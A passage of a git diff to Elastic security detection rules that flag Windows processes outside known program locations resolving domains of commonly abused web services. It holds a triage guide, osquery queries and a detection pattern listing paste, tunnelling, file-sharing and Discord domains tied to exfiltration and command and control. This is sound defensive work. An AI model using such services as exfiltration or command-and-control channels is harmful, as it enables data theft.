cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This rule has a high chance to produce false positives because it detects communication with legitimate services. Noisy false positives can be added as exceptions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Connection to Commonly Abused Web Services\n\nAdversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise.\n\nThis rule looks for processes outside known legitimate program locations communicating with a list of services that can be abused for exfiltration or command and control.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Verify whether the digital signature exists in the executable.\n- Identify the operation type (upload, download, tunneling, etc.).\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This rule has a high chance to produce false positives because it detects communication with legitimate services. Noisy false positives can be added as exceptions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "network where host.os.type == \"windows\" and network.protocol == \"dns\" and\n process.name != null and user.id not in (\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\") and\n /* Add new WebSvc domains here */\n dns.question.name :\n (\n \"raw.githubusercontent.*\",\n \"*.pastebin.*\",\n \"*drive.google.*\",\n \"*docs.live.*\",\n \"*api.dropboxapi.*\",\n \"*dropboxusercontent.*\",\n \"*onedrive.*\",\n \"*4shared.*\",\n \"*.file.io\",\n \"*filebin.net\",\n \"*slack-files.com\",\n \"*ghostbin.*\",\n \"*ngrok.*\",\n \"*portmap.*\",\n \"*serveo.net\",\n \"*localtunnel.me\",\n \"*pagekite.me\",\n \"*localxpose.io\",\n \"*notabug.org\",\n \"rawcdn.githack.*\",\n \"paste.nrecom.net\",\n \"zerobin.net\",\n \"controlc.com\",\n \"requestbin.net\",\n \"cdn.discordapp.com\",\n \"discordapp.com\",\n \"discord.com\",\n \"script.google.com\",\n \"script.googleusercontent.com\"\n ) and\n /* Insert noisy false positives here */\n not (\n process.executable : (\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Windows\\\\System32\\\\WWAHost.exe\",\n \"?:\\\\Windows\\\\System32\\\\smartscreen.exe\",\n \"?:\\\\Windows\\\\System32\\\\MicrosoftEdgeCP.exe\",\n \"?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\*\\\\MsMpEng.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Programs\\\\Fiddler\\\\Fiddler.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\OneDrive.exe\",\n \"?:\\\\Windows\\\\system32\\\\mobsync.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\mobsync.exe\"\n ) or\n \n /* Discord App */\n (process.name : \"Discord.exe\" and (process.code_signature.subject_name : \"Discord Inc.\" and\n process.code_signature.trusted == true) and dns.question.name : (\"discord.com\", \"cdn.discordapp.com\", \"discordapp.com\")\n ) or \n\n /* MS Sharepoint */\n (process.name : \"Microsoft.SharePoint.exe\" and (process.code_signature.subject_name : \"Microsoft Corporation\" and\n process.code_signature.trusted == true) and dns.question.name : \"onedrive.live.com\"\n ) or \n\n /* Firefox */\n (process.name : \"firefox.exe\" and (process.code_signature.subject_name : \"Mozilla Corporation\" and\n process.code_signature.trusted == true)\n )\n ) \n", "related_integrations": [ { @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", @@ -89,7 +89,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0010", "name": "Exfiltration", diff --git a/packages/security_detection_engine/kibana/security_rule/66883649-f908-4a5b-a1e0-54090a1d3a32_108.json b/packages/security_detection_engine/kibana/security_rule/66883649-f908-4a5b-a1e0-54090a1d3a32_108.json index 9f25a808cec..e330d106c90 100644 --- a/packages/security_detection_engine/kibana/security_rule/66883649-f908-4a5b-a1e0-54090a1d3a32_108.json +++ b/packages/security_detection_engine/kibana/security_rule/66883649-f908-4a5b-a1e0-54090a1d3a32_108.json @@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Connection to Commonly Abused Web Services", - "note": "## Triage and analysis\n\n### Investigating Connection to Commonly Abused Web Services\n\nAdversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise.\n\nThis rule looks for processes outside known legitimate program locations communicating with a list of services that can be abused for exfiltration or command and control.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Verify whether the digital signature exists in the executable.\n- Identify the operation type (upload, download, tunneling, etc.).\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This rule has a high chance to produce false positives because it detects communication with legitimate services. Noisy false positives can be added as exceptions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Connection to Commonly Abused Web Services\n\nAdversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise.\n\nThis rule looks for processes outside known legitimate program locations communicating with a list of services that can be abused for exfiltration or command and control.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Verify whether the digital signature exists in the executable.\n- Identify the operation type (upload, download, tunneling, etc.).\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This rule has a high chance to produce false positives because it detects communication with legitimate services. Noisy false positives can be added as exceptions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "network where host.os.type == \"windows\" and network.protocol == \"dns\" and\n process.name != null and user.id not in (\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\") and\n /* Add new WebSvc domains here */\n dns.question.name :\n (\n \"raw.githubusercontent.*\",\n \"*.pastebin.*\",\n \"*drive.google.*\",\n \"*docs.live.*\",\n \"*api.dropboxapi.*\",\n \"*dropboxusercontent.*\",\n \"*onedrive.*\",\n \"*4shared.*\",\n \"*.file.io\",\n \"*filebin.net\",\n \"*slack-files.com\",\n \"*ghostbin.*\",\n \"*ngrok.*\",\n \"*portmap.*\",\n \"*serveo.net\",\n \"*localtunnel.me\",\n \"*pagekite.me\",\n \"*localxpose.io\",\n \"*notabug.org\",\n \"rawcdn.githack.*\",\n \"paste.nrecom.net\",\n \"zerobin.net\",\n \"controlc.com\",\n \"requestbin.net\",\n \"cdn.discordapp.com\",\n \"discordapp.com\",\n \"discord.com\",\n \"script.google.com\",\n \"script.googleusercontent.com\"\n ) and\n /* Insert noisy false positives here */\n not (\n process.executable : (\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Windows\\\\System32\\\\WWAHost.exe\",\n \"?:\\\\Windows\\\\System32\\\\smartscreen.exe\",\n \"?:\\\\Windows\\\\System32\\\\MicrosoftEdgeCP.exe\",\n \"?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\*\\\\MsMpEng.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Programs\\\\Fiddler\\\\Fiddler.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\OneDrive.exe\",\n \"?:\\\\Windows\\\\system32\\\\mobsync.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\mobsync.exe\"\n ) or\n \n /* Discord App */\n (process.name : \"Discord.exe\" and (process.code_signature.subject_name : \"Discord Inc.\" and\n process.code_signature.trusted == true) and dns.question.name : (\"discord.com\", \"cdn.discordapp.com\", \"discordapp.com\")\n ) or \n\n /* MS Sharepoint */\n (process.name : \"Microsoft.SharePoint.exe\" and (process.code_signature.subject_name : \"Microsoft Corporation\" and\n process.code_signature.trusted == true) and dns.question.name : \"onedrive.live.com\"\n ) or \n\n /* Firefox */\n (process.name : \"firefox.exe\" and (process.code_signature.subject_name : \"Mozilla Corporation\" and\n process.code_signature.trusted == true)\n )\n ) \n", "related_integrations": [ { @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", @@ -101,7 +101,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0010", "name": "Exfiltration", diff --git a/packages/security_detection_engine/kibana/security_rule/66883649-f908-4a5b-a1e0-54090a1d3a32_109.json b/packages/security_detection_engine/kibana/security_rule/66883649-f908-4a5b-a1e0-54090a1d3a32_109.json index e41814f601d..dd88354542f 100644 --- a/packages/security_detection_engine/kibana/security_rule/66883649-f908-4a5b-a1e0-54090a1d3a32_109.json +++ b/packages/security_detection_engine/kibana/security_rule/66883649-f908-4a5b-a1e0-54090a1d3a32_109.json @@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Connection to Commonly Abused Web Services", - "note": "## Triage and analysis\n\n### Investigating Connection to Commonly Abused Web Services\n\nAdversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise.\n\nThis rule looks for processes outside known legitimate program locations communicating with a list of services that can be abused for exfiltration or command and control.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Verify whether the digital signature exists in the executable.\n- Identify the operation type (upload, download, tunneling, etc.).\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This rule has a high chance to produce false positives because it detects communication with legitimate services. Noisy false positives can be added as exceptions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Connection to Commonly Abused Web Services\n\nAdversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise.\n\nThis rule looks for processes outside known legitimate program locations communicating with a list of services that can be abused for exfiltration or command and control.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Verify whether the digital signature exists in the executable.\n- Identify the operation type (upload, download, tunneling, etc.).\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This rule has a high chance to produce false positives because it detects communication with legitimate services. Noisy false positives can be added as exceptions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "network where host.os.type == \"windows\" and network.protocol == \"dns\" and\n process.name != null and user.id not in (\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\") and\n /* Add new WebSvc domains here */\n dns.question.name :\n (\n \"raw.githubusercontent.*\",\n \"*.pastebin.*\",\n \"*drive.google.*\",\n \"*docs.live.*\",\n \"*api.dropboxapi.*\",\n \"*dropboxusercontent.*\",\n \"*onedrive.*\",\n \"*4shared.*\",\n \"*.file.io\",\n \"*filebin.net\",\n \"*slack-files.com\",\n \"*ghostbin.*\",\n \"*ngrok.*\",\n \"*portmap.*\",\n \"*serveo.net\",\n \"*localtunnel.me\",\n \"*pagekite.me\",\n \"*localxpose.io\",\n \"*notabug.org\",\n \"rawcdn.githack.*\",\n \"paste.nrecom.net\",\n \"zerobin.net\",\n \"controlc.com\",\n \"requestbin.net\",\n \"cdn.discordapp.com\",\n \"discordapp.com\",\n \"discord.com\",\n \"script.google.com\",\n \"script.googleusercontent.com\"\n ) and\n /* Insert noisy false positives here */\n not (\n (\n process.executable : (\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Windows\\\\System32\\\\WWAHost.exe\",\n \"?:\\\\Windows\\\\System32\\\\smartscreen.exe\",\n \"?:\\\\Windows\\\\System32\\\\MicrosoftEdgeCP.exe\",\n \"?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\*\\\\MsMpEng.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\BraveSoftware\\\\*\\\\Application\\\\brave.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Vivaldi\\\\Application\\\\vivaldi.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Programs\\\\Opera*\\\\opera.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Programs\\\\Fiddler\\\\Fiddler.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\OneDrive.exe\",\n \"?:\\\\Windows\\\\system32\\\\mobsync.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\mobsync.exe\"\n ) and process.code_signature.trusted == true\n ) or\n \n /* Discord App */\n (process.name : \"Discord.exe\" and (process.code_signature.subject_name : \"Discord Inc.\" and\n process.code_signature.trusted == true) and dns.question.name : (\"discord.com\", \"cdn.discordapp.com\", \"discordapp.com\")\n ) or \n\n /* MS Sharepoint */\n (process.name : \"Microsoft.SharePoint.exe\" and (process.code_signature.subject_name : \"Microsoft Corporation\" and\n process.code_signature.trusted == true) and dns.question.name : \"onedrive.live.com\"\n ) or \n\n /* Firefox */\n (process.name : \"firefox.exe\" and (process.code_signature.subject_name : \"Mozilla Corporation\" and\n process.code_signature.trusted == true)\n ) or \n\n /* Dropbox */\n (process.name : \"Dropbox.exe\" and (process.code_signature.subject_name : \"Dropbox, Inc\" and\n process.code_signature.trusted == true) and dns.question.name : (\"api.dropboxapi.com\", \"*.dropboxusercontent.com\")\n ) or \n\n /* Obsidian - Plugins are stored on raw.githubusercontent.com */\n (process.name : \"Obsidian.exe\" and (process.code_signature.subject_name : \"Dynalist Inc\" and\n process.code_signature.trusted == true) and dns.question.name : \"raw.githubusercontent.com\"\n ) or \n\n /* WebExperienceHostApp */\n (process.name : \"WebExperienceHostApp.exe\" and (process.code_signature.subject_name : \"Microsoft Windows\" and\n process.code_signature.trusted == true) and dns.question.name : (\"onedrive.live.com\", \"skyapi.onedrive.live.com\")\n )\n ) \n", "related_integrations": [ { @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", @@ -101,7 +101,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0010", "name": "Exfiltration", diff --git 